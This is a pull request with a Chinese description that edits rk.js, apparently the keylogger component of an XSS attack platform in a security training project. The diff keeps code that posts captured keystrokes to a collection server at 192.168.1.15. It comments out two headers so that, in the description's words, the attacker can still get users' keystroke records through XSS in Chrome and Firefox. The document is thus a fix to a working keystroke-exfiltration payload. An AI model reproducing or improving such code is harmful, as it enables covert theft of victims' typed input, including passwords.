### PR TITLE
update_rk.js

### DIFF
--- a/pkxss/rkeypress/rk.js
+++ b/pkxss/rkeypress/rk.js
@@ -53,7 +53,8 @@ function show() {
     var postdate = xl;
     ajax.open("POST", "http://192.168.1.15/pkxss/rkeypress/rkserver.php",true);
     ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
-    ajax.setRequestHeader("Content-length", postdate.length);
-    ajax.setRequestHeader("Connection", "close");
+    //目前主流浏览器会拒绝设置Content-length和Connection，注释这两行代码后攻击可正常执行
+    //ajax.setRequestHeader("Content-length", postdate.length);
+    //ajax.setRequestHeader("Connection", "close");
     ajax.send(postdate);
 }


### PR DESCRIPTION
当我使用rk.js时，像chrome和Firefox会弹出
已拒绝设置一个禁止头的尝试：Connection 
已拒绝设置一个禁止头的尝试：Content-length
如下图所示，但只需删除设置头的代码，攻击者仍可正常通过xss获取用户的键盘记录
![屏幕截图 2025-07-19 232157](https://github.com/user-attachments/assets/0aedad3a-bd0a-4700-8815-1891d44ae655)


![屏幕截图 2025-07-19 232331](https://github.com/user-attachments/assets/abcc3743-0ce8-4858-85ea-05b20e02acd2)
